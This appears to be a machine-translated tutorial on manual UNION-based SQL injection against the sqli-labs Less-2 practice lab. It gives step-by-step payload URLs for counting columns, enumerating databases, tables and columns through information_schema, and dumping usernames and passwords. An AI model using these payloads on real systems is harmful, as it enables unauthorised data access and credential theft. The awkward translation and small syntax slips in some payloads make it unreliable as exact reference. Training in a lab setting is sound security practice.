Objective
This article is one of the most basic procedures for SQL manual injection. Basically in sqlilabs above experiment, if know all of the knowledge point, can go through the following steps to take off pants. The following steps are also the basis for other methods of trousers removal. If you want to be proficient in SQL injection, then this most basic pant step must be understood and mastered.
For the convenience of illustration, we still use the previous digital injection point as an example to illustrate.
Get the total number of fields
In the previous introduction, we already know that in http://localhost/sqlilabs/Less-2/?id=1id
an injection point.
The SQL statements in the background are written roughly as
Select username,password,[...] from table where id=userinput
Then we use order by
the statement to determine the select
number of fields queried.
Then payload becomes:
Http://localhost/sqlilabs/Less-2/?id=1 ORDER by 1/2/3/4 ....
When using the order by 4
program error, select
the total field is 3.
Get the display bit
The field selected from is displayed on the page select
, and the next step is to determine which fields are displayed.
Use the following payload (both can be) to judge.
Http://localhost/sqlilabs/Less-2/?id=-1 Union Select 1,2,3
http://localhost/sqlilabs/Less-2/?id=1 and 1=2 Union Select 1,2,3
When you use the payload as above, the page appears as follows:
As you can see from the page above, the page displays the 2nd and 3rd bits of information.
Chachuncu
After you know the display bit, you can then display bits to show the information we want to know, such as the database version, user information, and so on. Then we can use the following payload to know the relevant information.
Http://localhost/sqlilabs/Less-2/?id=-1 Union Select 1,version (), Database ()
The page is displayed at this time:
You can see that the version information for the database and the database information currently in use appear on the page.
So next we know the names of all the databases in the database in this way.
Payload is as follows:
Http://localhost/sqlilabs/Less-2/?id=-1 Union Select 1,2,schema_name, from INFORMATION_SCHEMA. Schemata limit 0,1 #得到第一个库名
http://localhost/sqlilabs/Less-2/?id=-1 Union Select 1,2,schema_name, from information _schema. Schemata limit 1,1 #得到第二个库名
...
Chashin Table Name
Since the name of the database()
database used by the current web program is returned, we use it database()
to query all the table information. Of course in the previous step. And we already know that the present database
is security
.
Then we construct the payload as follows:
Http://localhost/sqlilabs/Less-2/?id=-1 Union SELECT 1,GROUP_CONCAT (TABLE_NAME), 3 from Information_schema.tables where Table_schema=database ()
So we get all the table names under the current database. The results of the page return are:
So we know that there are 4 tables in the current database, respectively emails,referers,uagents,users
.
Chashin Column Name
After we know the table name, we can then take advantage information_schema.columns
of the table name to get all the fields in the current table.
Payload is as follows:
Http://localhost/sqlilabs/Less-2/?id=-1 Union Select 1,group_concat (column_name), 3 from Information_schema.columns Where table_name= ' users '
http://localhost/sqlilabs/Less-2/?id=-1 Union select 1,group_concat (column_name), 3 From Information_schema.columns where table_name=0x7573657273 (hexadecimal for users)
The results of the page display are as follows:
With this statement, we know that these fields exist in the Users table USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS,id,username,password,id,name,password
. But when I tested it locally, there was a problem, actually, in the table for users in the security database, there were only id,username,password
3 fields, and the other fields were field names for the users table in the other database.
With the payload above, we can also know the name of the emails,referers,uagents
field in.
But sometimes the background code may only use where
clauses, then this time can not get the name of the information_schema.coumns
column, this time can only be based on your own years of hacker experience to guess the solution. Guessing the solution is also relatively simple, the use of exists
clauses can be guessed. Suppose that we already know the name of the table (and, of course, the table name is also done by using the EXISTS clause).
Guess the following statement:
Http://localhost/sqlilabs/Less-2/?id=1 and exists (select uname from users)
The main statement is exists(select 需要猜解的列名 from users)
this sentence pattern. If the column name does not exist in the users table uname
, the page does not display the content or the SQL Error statement appears directly.
As shown in the following:
The following is a guess at the fields that exist in the users table.
Http://localhost/sqlilabs/Less-2/?id=1 and exists (select username from users)
Guess there are columns in the Users table username
, the above statement program can return the results normally, so the life in the users table does exist in a username
column name.
Pants off
After we know all the table names and field names for the current database, we can dump all the information in the database. For example, we download all the data in the current users table.
You can use the following payload:
Http://localhost/sqlilabs/Less-2/?id=-1 Union Select 1,group_concat (Username,password), 3 from users
You can get all of the data from the Users table, and you can username
password
get data from other tables in this way.
Summarize
The above is a complete example of SQL injection, do not know that everyone has learned? Small series also need to continue to update the article on SQL injection, please continue to focus on the cloud-dwelling community.